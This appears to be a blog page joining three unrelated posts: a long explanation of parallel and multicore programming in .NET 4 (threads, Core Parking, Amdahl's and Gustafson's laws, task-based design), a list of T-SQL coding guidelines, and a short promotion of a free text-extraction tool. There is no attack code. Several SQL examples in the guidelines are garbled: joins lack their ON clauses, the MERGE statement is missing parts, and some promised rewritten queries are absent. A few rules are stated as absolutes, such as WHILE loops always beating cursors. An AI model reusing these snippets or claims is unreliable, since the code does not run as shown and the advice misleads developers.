Distributed-memory computer systems are composed of many processors with their own private memory, as illustrated in the below figure. Each processor can be in a different computer, with different types of communication channels between them. Examples of communication channels are wired and wireless networks. If a job running in one of the processors requires remote data, it has to communicate with the corresponding remote microprocessor through the communication channel. One of the most popular communications protocols used to program parallel applications to run on distributed-memory computer systems is Message Passing Interface (MPI). It is possible to use MPI to take advantage of shared-memory multicore with C# and .NET Framework. However, MPI’s main focus is to help developing applications run on clusters. Thus, it adds a big overhead that isn’t necessary in shared-memory multicore, where all the cores can access the memory without the need to send messages.

The figure below shows a distributed-memory computer system with three machines. Each machine has a quad-core processor, and shared-memory architecture for these cores. This way, the private memory for each microprocessor acts as a shared memory for its four cores. A distributed-memory system forces you to think about the distribution of the data, because each message to retrieve remote data can introduce an important latency. Because you can add new machines (nodes) to increase the number of processors for the system, distributed-memory systems can offer great scalability.

Parallel Programming and Multicore Programming

Traditional sequential code, where instructions run one after the other, doesn’t take advantage of multiple cores because the serial instructions run on only one of the available cores. Sequential code written with C# or VB 2010 won’t take advantage of multiple cores if it doesn’t use the new features offered by .NET Framework 4 to split the work into many cores. There isnt an automatic parallelization of existing sequential code.

Parallel programming is a form of programming in which the code takes advantage of the parallel execution possibilities offered by the underlying hardware. Parallel programming runs many instructions at the same time.

Multicore programming is a form of programming in which the code takes advantage of the multiple execution cores to run many instructions in parallel. Multicore and multiprocessor computers offer more than one processing core in a single machine. Hence, the goal is to “do more with less” meaning that the goal is to do more work in less time by distributing the work to be done in the available cores.

Modern microprocessors can also execute the same instruction on multiple data, a technique known as Single Instruction, Multiple Data or SIMD. This way, you can take advantage of these vector processors to reduce the time needed to execute certain algorithms.

Hardware Threads and Software Threads

A multicore processor has more than one physical core. A physical core is a real independent processing unit that makes it possible to run multiple instructions at the same time, in parallel. In order to take advantage of multiple physical cores, it is necessary to run many processes or to run more than one thread in a single process, creating multithreaded code. However, each physical core can offer more than one hardware thread, also known as a logical core or logical processor. Microprocessors with Intel Hyper-Threading Technology (HT or HTT) offer many architectural states per physical core. For example, many processors with four physical cores with HT duplicate the architectural states per physical core and offer eight hardware threads. This technique is known as simultaneous multithreading (SMT) and it uses the additional architectural states to optimize and increase the parallel execution at the microprocessor’s instruction level. SMT isn’t restricted to just two hardware threads per physical core; for example, you could have four hardware threads per core. This doesn’t mean that each hardware thread represents a physical core. SMT can offer performance improvements for multithreaded code under certain scenarios.

Each running program in Windows is a process. Each process creates and runs one or more threads, known as software threads to differentiate them from the previously explained hardware threads.

A process has at least one thread, the main thread. An operating system scheduler shares out the available processing resources fairly between all the processes and threads it has to run. Windows scheduler assigns processing time to each software thread. When Windows scheduler runs on a multicore processor, it has to assign time from a hardware thread, supported by a physical core, to each software thread that needs to run instructions. As an analogy, you can think of each hardware thread as a swim lane and a software thread as a swimmer.

Windows recognizes each hardware thread as a schedulable logical processor. Each logical processor can run code for a software thread. A process that runs code in multiple software threads can take advantage of hardware threads and physical cores to run instructions in parallel. The figure below shows software threads running on hardware threads and on physical cores. Windows scheduler can decide to reassign one software thread to another hardware thread to load-balance the work done by each hardware thread.

Because there are usually many other software threads waiting for processing time, load balancing will make it possible for these other threads to run their instructions by organizing the available resources. The figure below shows Windows Task Manager displaying eight hardware threads (logical cores and their workloads). Load balancing refers to the practice of distributing work from software threads among hardware threads so that the workload is fairly shared across all the hardware threads. However, achieving perfect load balance depends on the parallelism within the application, the workload, the number of software threads, the available hardware threads, and the load-balancing policy.

Windows runs hundreds of software threads by assigning chunks of processing time to each available hardware thread. You can use Windows Resource Monitor to view the number of software threads for a specific process in the Overview tab. The CPU panel displays the image name for each process and the number of associated software threads in the Threads column, as shown in the figure below where the vlc.exe process has 32 software threads.

Core Parking is a Windows kernel power manager and kernel scheduler technology designed to improve the energy efficiency of multicore systems. It constantly tracks the relative workloads of every hardware thread relative to all the others and can decide to put some of them into sleep mode. Core Parking dynamically scales the number of hardware threads that are in use based on workload. When the workload for one of the hardware threads is lower than a certain threshold value, the Core Parking algorithm will try to reduce the number of hardware threads that are in use by parking some of the hardware threads in the system. In order to make this algorithm efficient, the kernel scheduler gives preference to unparked hardware threads when it schedules software threads. The kernel scheduler will try to let the parked hardware threads become idle, and this will allow them to transition into a lower-power idle state.

Core Parking tries to intelligently schedule work between threads that are running on multiple hardware threads in the same physical core on systems with processors that include HT. This scheduling decision decreases power consumption. Windows Server 2008 R2 supports the complete Core Parking technology. However, Windows 7 also uses the Core Parking algorithm and infrastructure to balance processor performance between hardware threads with processors that include HT. The figure below shows Windows Resource Monitor displaying the activity of eight hardware threads, with four of them parked.

Regardless of the number of parked hardware threads, the number of hardware threads returned by

.NET Framework 4 functions will be the total number, not just the unparked ones. Core Parking technology doesn’t limit the number of hardware threads available to run software threads in a process. Under certain workloads, a system with eight hardware threads can turn itself into a system with two hardware threads when it is under a light workload, and then increase and spin up reserve hardware threads as needed. In some cases, Core Parking can introduce an additional latency to schedule many software threads that try to run code in parallel. Therefore, it is very important to consider the resultant latency when measuring the parallel performance.

Amdahl’s Law

If you want to take advantage of multiple cores to run more instructions in less time, it is necessary to split the code in parallel sequences. However, most algorithms need to run some sequential code to coordinate the parallel execution. For example, it is necessary to start many pieces in parallel and then collect their results. The code that splits the work in parallel and collects the results could be sequential code that doesn’t take advantage of parallelism. If you concatenate many algorithms like this, the overall percentage of sequential code could increase and the performance benefits achieved may decrease. Gene Amdahl, a renowned computer architect, made observations regarding the maximum performance improvement that can be expected from a computer system when only a fraction of the system is improved. He used these observations to define Amdahls Law, which consists of the following formula that tries to predict the theoretical maximum performance improvement (known as speedup) using multiple processors. It can also be applied with parallelized algorithms that are going to run with multicore microprocessors.

Maximum speedup (in times) = 1 / ((1 – P) + (P/N))


  • P is the portion of the code that runs completely in parallel.
  • N is the number of available execution units (processors or physical cores).

According to this formula, if you have an algorithm in which only 50 percent (P = 0.50) of its total work is executed in parallel, the maximum speedup will be 1.33x on a microprocessor with two physical cores. The figure below illustrates an algorithm with 1,000 units of work split into 500 units of sequential work and 500 units of parallelized work. If the sequential version takes 1,000 seconds to complete, the new version with some parallelized code will take no less than 750 seconds.

Maximum speedup (in times) = 1 / ((1 – 0.50) + (0.50 / 2)) = 1.33x

The maximum speedup for the same algorithm on a microprocessor with eight physical cores will be a really modest 1.77x. Therefore, the additional physical cores will make the code take no less than 562.5 seconds.

Maximum speedup (in times) = 1 / ((1 – 0.50) + (0.50 / 8)) = 1.77x

The figure below shows the maximum speedup for the algorithm according to the number of physical cores, from 1 to 16. As we can see, the speedup isn’t linear, and it wastes processing power as the number of cores increases.

The figure below shows the same information using a new version of the algorithm in which 90 percent (P = 0.90) of its total work is executed in parallel. In fact, 90 percent of parallelism is a great achievement, but it results in a 6.40x speedup on a microprocessor with 16 physical cores.

Maximum speedup (in times) = 1 / ((1 – 0.90) + (0.90 / 16)) = 6.40x

Gustafson’s Law

John Gustafson noticed that Amdahl’s Law viewed the algorithms as fixed, while considering the changes in the hardware that runs them. Thus, he suggested a reevaluation of this law in 1988. He considers that speedup should be measured by scaling the problem to the number of processors and not by fixing the problem size. When the parallel-processing possibilities offered by the hardware increase, the problem workload scales. Gustafsons Law provides the following formula with the focus on the problem size to measure the amount of work that can be performed in a fixed time:

Total work (in units) = S + (N × P)


  • S represents the units of work that run with a sequential execution.
  • P is the size of each unit of work that runs completely in parallel.
  • N is the number of available execution units (processors or physical cores).

You can consider a problem composed of 50 units of work with a sequential execution. The problem can also schedule parallel work in 50 units of work for each available core. If you have a processor with two physical cores, the maximum amount of work is going to be 150 units.

Total work (in units) = 50 + (2 × 50) = 150 units of work

The figure below illustrates an algorithm with 50 units of work with a sequential execution and a parallelized section. The latter scales according to the number of physical cores. This way, the parallelized section can process scalable, parallelizable 50 units of work. The workload in the parallelized section increases when more cores are available. The algorithm can process more data in less time if there are enough additional units of work to process in the parallelized section. The same algorithm can run on a processor with eight physical cores. In this case, it will be capable of processing 450 units of work in the same amount of time required for the previous case:

Total work (in units) = 50 + (8 × 50) = 450 units of work

The figure below shows the speedup for the algorithm according to the number of physical cores, from 1 to 16. This speedup is possible provided there are enough units of work to process in parallel when the number of cores increases. As you can see, the speedup is better than the results offered by applying Amdahl’s Law.

The figure below shows the total amount of work according to the number of available physical cores, from 1 to 32.

The figure below illustrates many algorithms composed of several units of work with a sequential execution and parallelized sections. The parallelized sections scale as the number of available cores increases. The impact of the sequential sections decreases as more scalable parallelized sections run units of work. In this case, it is necessary to calculate the total units of work for both the sequential and parallelized sections and then apply them to the formula to find out the total work with eight physical cores:

Total sequential work (in units) = 25 + 150 + 100 + 150 = 425 units of work

Total parallel unit of work (in units) = 50 + 200 + 300 = 550 units of work

Total work (in units) = 425 + (8 × 550) = 4,825 units of work

A sequential execution would be capable of executing only 975 units of work in the same amount of time:

Total work with a sequential execution (in units) =

25 + 50 + 150 + 200 + 100 + 300 + 150 = 975 units of work

Working with Lightweight Concurrency

Unfortunately, neither Amdahl’s Law nor Gustafson’s Law takes into account the overhead introduced by parallelism. Nor do they consider the existence of patterns that allow the transformation of sequential parts into new algorithms that can take advantage of parallelism. It is very important to reduce the sequential code that has to run in applications to improve the usage of the parallel execution units.

In previous .NET Framework versions, if you wanted to run code in parallel in a C# application you had to create and manage multiple threads (software threads). Therefore, you had to write complex multithreaded code. Splitting algorithms into multiple threads, coordinating the different units of code, sharing information between them, and collecting the results are indeed complex programming jobs. As the number of logical cores increases, it becomes even more complex, because you need more threads to achieve better scalability. The multithreading model wasn’t designed to help developers tackle the multicore revolution. In fact, creating a new thread requires a lot of processor instructions and can introduce a lot of overhead for each algorithm that has to be split into parallelized threads. Many of the most useful structures and classes were not designed to be accessed by different threads, and, therefore, a lot of code had to be added to make this possible. This additional code distracts the developer from the main goal: achieving a performance improvement through parallel execution.

Because this multithreading model is too complex to handle the multicore revolution, it is known as heavyweight concurrency. It adds an important overhead. It requires adding too many lines of code to handle potential problems because of its lack of support of multithreaded access at the framework level, and it makes the code complex to understand.

The aforementioned problems associated with the multithreading model offered by previous .NET

Framework versions and the increasing number of logical cores offered in modern processors motivated the creation of new models to allow creating parallelized sections of code. The new model is known as lightweight concurrency, because it reduces the overall overhead needed to create and execute code in different logical cores. It doesnt mean that it eliminates the overhead introduced by parallelism, but the model is prepared to work with modern multicore microprocessors. The heavyweight concurrency model was born in the multiprocessor era, when a computer could have many physical processors with one physical core in each. The lightweight concurrency model takes into account the new micro architectures in which many logical cores are supported by some physical cores. The lightweight concurrency model is not just about scheduling work in different logical cores. It also adds support of multithreaded access at the framework level, and it makes the code much simpler to understand. Most modern programming languages are moving to the lightweight concurrency model. Luckily, .NET Framework 4 is part of this transition. Thus, all the managed languages that can generate .NET applications can take advantage of the new model.

Creating Successful Task-Based Designs

Sometimes, you have to optimize an existing solution to take advantage of parallelism. In these cases, you have to understand an existing sequential design or a parallelized algorithm that offers a reduced scalability, and then you have to refactor it to achieve a performance improvement without introducing problems or generating different results. You can take a small part or the whole problem and create a taskbased design, and then you can introduce parallelism. The same technique can be applied when you have to design a new solution. You can create successful task-based designs by following these steps:

  1. Split each problem into many subproblems and forget about sequential execution.
  2. Think about each subproblem as any of the following:
    1. Data that can be processed in parallel — Decompose data to achieve parallelism.
    2. Data flows that require many tasks and that could be processed with some kind of complex parallelism — Decompose data and tasks to achieve parallelism.
    3. Tasks that can run in parallel — decompose tasks to achieve parallelism.
    4. Organize your design to express parallelism.
    5. Determine the need for tasks to chain the different subproblems. Try to avoid dependencies as much as possible (minimizes locks).
    6. Design with concurrency and potential parallelism in mind.
    7. Analyze the execution plan for the parallelized problem considering current multicore microprocessors and future architectures. Prepare your design for higher scalability.
    8. Minimize critical sections as much as possible.
    9. Implement parallelism using task-based programming whenever possible.
    10. Tune and iterate.

The aforementioned steps don’t mean that all the subproblems are going to be parallelized tasks running in different threads. The design has to consider the possibility of parallelism and then, when it is time to code, you can decide the best option according to the performance and scalability goals. It is very important to think in parallel and split the work to be done into tasks. This way, you will be able to parallelize your code as needed. If you have a design prepared for a classic sequential execution, it is going to take a great effort to parallelize it by using task-based programming techniques.

Designing With Concurrency in Mind

When you design code to take advantage of multiple cores, it is very important to stop thinking that the code inside a C# application is running alone. C# is prepared for concurrent code, meaning that many pieces of code can run inside the same process simultaneously or with an interleaved execution. The same class method can be executed in concurrent code. If this method saves a state in a static variable and then uses this saved state later, many concurrent executions could yield unexpected and unpredictable results.

As previously explained, parallel programming for multicore microprocessors works with the shared-memory model. The data resides in the same shared memory, which could lead to unexpected results if the design doesn’t consider concurrency. It is a good practice to prepare each class and method to be able to run concurrently, without side effects. If you have classes, methods, or components that weren’t designed with concurrency in mind, you would have to test their designs before using them in parallelized code.

Each subproblem detected in the design process should be capable of running while the other subproblems are being executed concurrently. If you think that it is necessary to restrict concurrent code when a certain subproblem runs because it uses legacy classes, methods, or components, it should be made clear in the design documents. Once you begin working with parallelized code, it is very easy to incorporate other existing classes, methods, and components that create undesired side effects because they weren’t designed for concurrent execution.

Interleaved Concurrency, Concurrency, and Parallelism

The figure below illustrates the differences between interleaved concurrency and concurrency when there are two software threads and each one executes four instructions. The interleaved concurrency scenario executes one instruction for each thread, interleaving them, but the concurrency scenario runs two instructions in parallel, at the same time. The design has to be prepared for both scenarios.

Concurrency requires physically simultaneous processing to happen.

Parallelized code can run in many different concurrency and interleaved concurrency scenarios, even when it is executed in the same hardware configuration. Thus, one of the great challenges of a parallel design is to make sure that its execution with different possible valid orders and interleaves will lead to the correct result, otherwise known as correctness. If you need a specific order or certain parts of the code don’t have to run together, it is necessary to make sure that these parts don’t run concurrently. You cannot assume that they don’t run concurrently because you run it many times and it produces the expected results. When you design for concurrency and parallelism, you have to make sure that you consider correctness.

Minimizing Critical Sections

Both Amdahl’s Law and Gustafson’s Law recognized sequential work as an enemy of the overall performance in parallelized algorithms. The serial time between two parallelized sections that needs a sequential execution is known as a critical section. The figure below identifies four critical sections in one of the diagrams used to analyze Gustafson’s Law.

When you parallelize tasks, one of the most important goals in order to achieve the best performance is to minimize these critical sections. Most of the time, it is impossible to avoid some code that has to run with a sequential execution between two parallelized sections, because it is necessary to launch the parallel jobs and to collect results. However, optimizing the code in the critical sections and removing the unnecessary ones is even more important than the proper tuning of parallelized code.

When you face an execution plan with too many critical sections, remember Amdahl’s Law. If you cannot reduce them, try to find tasks that could run in parallel with the critical sections. For example, you can pre-fetch data that is going to be consumed by the next parallelized algorithm in parallel with a critical section to improve the overall performance offered by the solution. It is very important that you consider the capabilities offered by modern multicore hardware to avoid thinking you have just one single execution unit.


Microsoft SQL Server Management Studio display...

Image via Wikipedia


Naming Conventions
All T-SQL Keywords must be upper case.
All declared variable names must be Camel Case while all stored procedure names, function names, trigger names, Table names and Columns names in query must be Pascal Case.
All view names must start with the letter ‘v’ followed by the name of the view in Pascal Case

DECLARE @minSalary int

If you are creating a table belonging to a specific module, make sure to append a 3 character prefix before the name of each table, example:


Note that all table names must be singular.
When creating columns, make sure to append a ‘_F’ to the end of each column you intend to use as a flag. If there are exactly two statuses for the flag, use ‘bit’ data type, if there are 3 or more statuses, use ‘char(1)’ data type. If the column is foreign key reference, append ‘_FK’ to the end of the column name. This makes it easy to distinguish flag and foreign key columns:

FirstName varchar(max),
Sex_F BIT,
Person_FK int,
Status_F CHAR(1)

Declaring Variables
Always declare variables at the top of your stored procedure and set their values directly after declaration. If your database runs on SQL Server 2008, you can declare and set the variable on the same line. Take a look at the following statement under SQL 2000/SQL 2005 and the second statement under SQL 2008. Standard programming language semantics are added in SQL 2008 for short assignment of values:

DECLARE @i int
SET @i = 1
SET @i = @i + 1
DECLARE @i int = 1
SET @i +=1

Select Statements
Do not use SELECT * in your queries. Always write the required column names after the SELECT statement. This technique results in reduced disk I/O and better performance:

SELECT CustomerID, CustomerFirstName, City From Customer

If you need to write a SELECT statement to retrieve data from a single table, don’t SELECT the data from a view that points to multiple tables. Instead, SELECT the data from the table directly, or from a view that only contains the table you are interested in. If you SELECT the data from the multi-table view, the query will experience unnecessary overhead, and performance will be hindered.

Try to avoid server side cursors as much as possible. Always stick to a ‘set-based approach’ instead of a ‘procedural approach’ for accessing and manipulating data. Cursors can often be avoided by using SELECT statements instead.
If a cursor is unavoidable, use a WHILE loop instead. A WHILE loop is always faster than a cursor. But for a WHILE loop to replace a cursor you need a column (primary key or unique key) to identify each row uniquely.

Wildcard Characters
Try to avoid wildcard characters at the beginning of a word while searching using the LIKE keyword, as that result in an index scan, which defeats the purpose of an index. The following statement results in an index scan, while the second statement results in an index seek:

SELECT EmployeeID FROM Locations WHERE FirstName LIKE '%li'
SELECT EmployeeID FROM Locations WHERE FirsName LIKE 'a%i'

Not Equal Operators
Avoid searching using not equals operators (<> and NOT) as they result in table and index scans.

Derived Tables
Use ‘Derived tables’ wherever possible, as they perform better. Consider the following query to find the second highest salary from the Employees table:

SELECT MIN(Salary) FROM Employees WHERE EmpID IN (SELECT TOP 2 EmpID FROM Employees ORDER BY Salary Desc)

The same query can be re-written using a derived table, as shown below, and it performs twice as fast as the above query:


This is just an example, and your results might differ in different scenarios depending on the database design, indexes, volume of data, etc. So, test all the possible ways a query could be written and go with the most efficient one.

SQL Batches
Use SET NOCOUNT ON at the beginning of your SQL batches, stored procedures and triggers in production environments.
This suppresses messages like ‘(1 row(s) affected)’ after executing INSERT, UPDATE, DELETE and SELECT statements. This improves the performance of stored procedures by reducing network traffic.

ANSI-Standard Join Clauses
Use the more readable ANSI-Standard Join clauses instead of the old style joins. With ANSI joins, the WHERE clause is used only for filtering data. Whereas with older style joins, the WHERE clause handles both the join condition and filtering data. The first of the following two queries shows the old style join, while the second one show the new ANSI join syntax:

SELECT a.au_id, t.title FROM titles t, authors a, titleauthor ta WHERE
a.au_id = ta.au_id AND
ta.title_id = t.title_id AND
t.title LIKE '%Computer%'
SELECT a.au_id, t.title
FROM authors a
INNER JOIN titleauthor ta
a.au_id = ta.au_id
INNER JOIN titles t
ta.title_id = t.title_id WHERE t.title LIKE '%Computer%'

Stored Procedures Naming Convention
Do not prefix your stored procedure names with “sp_”. The prefix sp_ is reserved for system stored procedure that ship with SQL Server. Whenever SQL Server encounters a procedure name starting with sp_, it first tries to locate the procedure in the master database, then it looks for any qualifiers (database, owner) provided, then it tries dbo as the owner.
So you can really save time in locating the stored procedure by avoiding the “sp_” prefix.

Using Views
Views are generally used to show specific data to specific users based on their interest. Views are also used to restrict access to the base tables by granting permission only on views. Yet another significant use of views is that they simplify your queries.
Incorporate your frequently required, complicated joins and calculations into a view so that you don’t have to repeat those joins/calculations in all your queries. Instead, just select from the view.

Text Data Types
Try not to use TEXT or NTEXT data types for storing large textual data.
The TEXT data type has some inherent problems associated with it and will be removed from future version of Microsoft SQL Server.
For example, you cannot directly write or update text data using the INSERT or UPDATE
Statements. Instead, you have to use special statements like READTEXT, WRITETEXT and UPDATETEXT.
There are also a lot of bugs associated with replicating tables containing text columns.
So, if you don’t have to store more than 8KB of text, use CHAR(8000) or VARCHAR(8000) data types instead.
In SQL 2005 and 2008, you can use VARCHAR(max) for storing unlimited amount of textual data.

Insert Statements
Always use a column list in your INSERT statements. This helps in avoiding problems when the table structure changes (like adding or dropping a column).

Accessing Tables
Always access tables in the same order in all your stored procedures and triggers consistently. This helps in avoiding deadlocks. Other things to keep in mind to avoid deadlocks are:
1. Keep your transactions as short as possible. Touch as few data as possible during a transaction.
2. Never, ever wait for user input in the middle of a transaction.
3. Do not use higher level locking hints or restrictive isolation levels unless they are absolutely needed.
4. Make your front-end applications deadlock-intelligent, that is, these applications should be able to resubmit the transaction incase the previous transaction fails with error 1205.
5. In your applications, process all the results returned by SQL Server immediately so that the locks on the processed rows are released, hence no blocking.

Stored Procedure Returning Values
Make sure your stored procedures always return a value indicating their status. Standardize on the return values of stored procedures for success and failures.
The RETURN statement is meant for returning the execution status only, but not data. If you need to return data, use OUTPUT parameters.
If your stored procedure always returns a single row result set, consider returning the result set using OUTPUT parameters instead of a SELECT statement, as ADO handles output parameters faster than result sets returned by SELECT statements.

Object Case
Always be consistent with the usage of case in your code. On a case insensitive server, your code might work fine, but it will fail on a case sensitive SQL Server if your code is not consistent in case.
For example, if you create a table in SQL Server or a database that has a case-sensitive or binary sort order; all references to the table must use the same case that was specified in the CREATE TABLE statement.
If you name the table as ‘MyTable’ in the CREATE TABLE statement and use ‘mytable’ in the SELECT statement, you get an ‘object not found’ error.

T-SQL Variables
Though T-SQL has no concept of constants (like the ones in the C language), variables can serve the same purpose. Using variables instead of constant values within your queries improves readability and maintainability of your code. Consider the following example:

SELECT OrderID, OrderDate FROM Orders WHERE OrderStatus IN (5,6)

The same query can be re-written in a mode readable form as shown below:

SELECT OrderID, OrderDate FROM Orders

Offload tasks
Offload tasks, like string manipulations, concatenations, row numbering, case conversions, type conversions etc., to the front-end applications if these operations are going to consume more CPU cycles on the database server.
Also try to do basic validations in the front-end itself during data entry. This saves unnecessary network roundtrips.

Check for record Existence
If you need to verify the existence of a record in a table, don’t use SELECT COUNT (*) in your Transact-SQL code to identify it, which is very inefficient and wastes server resources. Instead, use the Transact-SQL IF EXITS to determine if the record in question exits, which is much more efficient. For example:
Here’s how you might use COUNT(*):

IF (SELECT COUNT(*) FROM table_name WHERE column_name = 'xxx')

Here’s a faster way, using IF EXISTS:

IF EXISTS (SELECT * FROM table_name WHERE column_name = 'xxx')

The reason IF EXISTS is faster than COUNT(*) is because the query can end immediately when the text is proven true, while COUNT(*) must count go through every record, whether there is only one, or thousands, before it can be found to be true.

Object Owner
For best performance, all objects that are called from within the same stored procedure should all be owned by the same owner, preferably dbo. If they are not, then SQL Server must perform name resolution on the objects if the object names are the same but the owners are different. When this happens, SQL Server cannot use a stored procedure “in-memory plan” over, instead, it must re-compile the stored procedure, which hinders performance.
There are a couple of reasons, one of which relates to performance. First, using fully qualified names helps to eliminate any potential confusion about which stored procedure you want to run, helping to prevent bugs and other potential problems. But more importantly, doing so allows SQL Server to access the stored procedures execution plan more directly, and in turn, speeding up the performance of the stored procedure. Yes, the performance boost is very small, but if your server is running tens of thousands or more stored procedures every hour, these little time savings can add up.

Upsert Statements
SQL Server 2008 introduces Upsert statements which combine insert, update, and delete statements in one ‘Merge’ statement.
Always use the Merge statement to synchronize two tables by inserting, updating, or deleting rows in one table based on differences found in the other table

MERGE table1 AS target
FROM table2
) AS source (ID,Name)
target.Table2ID = source.ID
INSERT (name, Table2ID)
VALUES(name + ' not matched', source.ID)
SET target.name = source.name + ' matched'
OUTPUT $action,inserted.id,deleted.id;

DateTime Columns
Always use ‘datetime2’ data type in SQL 2008 instead of the classic ‘datetime’. Datetime2 offers optimized data storage by saving 1 additional byte from the classic datetime. It has a larger date range, a larger default fractional precision, and optional user-specified precision.
If your column is supposed to store the date only portion, use the ‘date’ date type while if you want to store the time portion, use the ‘time’ data type. Below is a list of examples of these new data types look like:

time 12:35:29. 1234567
date 2007-05-08
smalldatetime 2007-05-08 12:35:00
datetime 2007-05-08 12:35:29.123
datetime2 2007-05-08 12:35:29. 1234567
datetimeoffset 2007-05-08 12:35:29.1234567 +12:15

Measure Query Performance
Always use statistics time feature to measure your important query and stored procedure’s performance. Use statistics time to optimize your queries Take a look at this example:

EXEC GetMedicalProcedures 1,10

The below information will be displayed in the Messages tab:
SQL Server parse and compile time:
CPU time = 6 ms, elapsed time = 6 ms.
SQL Server Execution Times:
CPU time = 24 ms, elapsed time = 768 ms.
(10 row(s) affected)
SQL Server Execution Times:
CPU time = 0 ms, elapsed time = 125 ms.
SQL Server Execution Times:
CPU time = 16 ms, elapsed time = 131 ms.

This provides a good estimation of how long the query took to be executed, showing the CPU time (processing time) and elapsed time (CPU + I/O).

Create indexes on tables that have high querying pressure using select statements. Be careful not to create an index on tables that are subject to real-time changes using CRUD operations.
An index speeds up a select clause if the indexed column is included in the query, especially if it is in the WHERE clause. However, the same index slows down an insert statement whether or not the indexed column is included in the query. This downside occurs because indexes readjust and update statistics every time the table structure is changed. So use indexes wisely for optimizing tables having high retrieval rate and low change rate.

Extract text from pdf, word, powerpoint, excel, onenote and more

Hey everyone, I just want to share with you my new free tool I developed recently. It is now available and provides great opportunity for users to extract text from documents in batch in just 1 click.

Extract Text is a free software that allows you to extract the text from pdf files, word documents, power point slides, mht and html web pages, microsoft office one note files, excel sheets and many other formats. All you need to do is select the bunch of files you wish to extract and hit the extract button. All the selected files will be automatically processed at once and an output folder is created containing a text file for each file.

Great tool, easy to use, very useful and FREE!

check it out here